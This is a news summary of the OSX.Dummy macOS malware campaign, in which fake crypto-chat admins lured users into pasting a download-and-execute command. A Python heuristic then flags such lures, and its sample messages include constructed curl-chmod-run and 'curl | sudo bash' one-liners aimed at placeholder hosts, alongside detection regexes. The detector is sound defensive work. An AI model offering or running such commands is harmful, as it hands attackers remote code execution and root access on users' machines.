Ars Technica: New cyber threat to Mac users uses cryptocurrency as a lure, and it is "dummy"
Someone impersonating administrators of cryptocurrency-related discussion channels on Slack, Discord and other social media platforms has been trying to lure users into installing macOS malware, Ars Technica reports. "The social-engineering campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs," the article says. "The command downloads a huge (34 megabyte) file and executes it, establishing a remote connection that acts as a backdoor for the attacker."
Malware experts have dubbed it "OSX.Dummy"; the attacker's intent is not yet clear
Patrick Wardle, a Mac malware expert, also examined the malware and dubbed it "OSX.Dummy" because, as he wrote: the infection method is dumb; the massive size of the binary is dumb; the persistence mechanism is lame (and thus also dumb); the capabilities are rather limited (and thus rather dumb); it's trivial to detect at every step (that dumb); and finally, the malware saves the user's password to dumpdummy. The attack was first noted by Remco Verhoef of SANS. According to Ars Technica, the attacker's intent is not yet clear. Because everything runs from a Terminal window, the unsigned code never meets macOS's Gatekeeper protection: Gatekeeper only inspects files that carry the quarantine attribute browsers attach to downloads, and a file fetched with curl and run directly does not carry it. Once running, the malware gives the attacker the ability to execute command-line code as the root user on infected Macs. Of course, the code first has to get past the victim's common sense.
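The lure described above is a generic pattern: a chat message tells the reader to paste a one-liner that fetches something from the network, makes it executable and runs it, often under sudo. The following triage heuristic is an added example written for this page, not code from Ars Technica, Patrick Wardle or SANS. It scans constructed chat messages for that "fetch, mark executable, run" chain and for sudo; the usernames, messages and URLs are placeholders, not the campaign's actual script, and the indicator names and scoring are this example's own choices.

```python
"""Heuristic triage of chat messages for "paste this into Terminal" lures.

Added example, not code from the page or from the researchers it cites.
Every message and URL below is a constructed placeholder.
"""
import re
from dataclasses import dataclass

# Constructed sample messages: (author, text). The first and third imitate the
# shape of a download-and-execute lure; the rest are ordinary chatter.
SAMPLE_MESSAGES = [
    ("mod_helper", "hey everyone, run this in Terminal to fix your wallet sync: "
     "cd /tmp && curl -s http://update.example.invalid/script > script "
     "&& chmod +x script && ./script"),
    ("alice", "anyone know why my node keeps dropping peers?"),
    ("support_bot", "quick fix: curl -sL https://tools.example.invalid/fix.sh | sudo bash"),
    ("bob", "brew install jq"),
    ("carol", "git clone https://github.com/example/repo.git && cd repo && make"),
]

# Each indicator is a regex over the whole pasted command (names are this example's).
INDICATORS = {
    # something is fetched from the network
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    # the fetched bytes go straight into an interpreter
    "pipe_to_interpreter": re.compile(r"\|\s*(sudo\s+)?(sh|bash|zsh|python3?|perl)\b"),
    # a dropped file is marked executable ...
    "mark_executable": re.compile(r"\bchmod\s+(\+x|u\+x|a\+x|[0-7]{3,4})\b"),
    # ... and then run from the current directory
    "run_local_file": re.compile(r"(?:^|[;&|]\s*)(?:sudo\s+)?\./\S+"),
    # sudo is what turns a pasted command into root and a password prompt
    "privilege_escalation": re.compile(r"\bsudo\b"),
    # common ways to hide what is actually being run
    "obfuscation": re.compile(r"\b(base64\s+(-d|-D|--decode)|eval)\b"),
}


@dataclass
class Verdict:
    author: str
    indicators: list
    drop_and_run: bool   # fetched from the network and executed in the same line
    elevated: bool       # asks for sudo, i.e. root plus the user's password


def classify(author: str, text: str) -> Verdict:
    """Return which indicators fire and whether the message looks like a lure."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    fetched = "remote_fetch" in hits
    executed = ("pipe_to_interpreter" in hits
                or ("mark_executable" in hits and "run_local_file" in hits))
    return Verdict(author, hits, fetched and executed, "privilege_escalation" in hits)


def triage(messages):
    """Classify a list of (author, text) pairs."""
    return [classify(author, text) for author, text in messages]


if __name__ == "__main__":
    for v in triage(SAMPLE_MESSAGES):
        flag = "LURE" if v.drop_and_run else "ok  "
        root = " (sudo)" if v.elevated else ""
        print(f"{flag} {v.author:<12} {', '.join(v.indicators) or '-'}{root}")
```

The verdict deliberately requires both a network fetch and an execution step in the same line: "brew install" or "git clone && make" do not trip it, while "curl ... > script && chmod +x script && ./script" and "curl ... | sudo bash" do. A moderation bot or a shell-history review can use the same rule; the sudo flag is worth surfacing separately, because that is the step that hands over both root and the typed password.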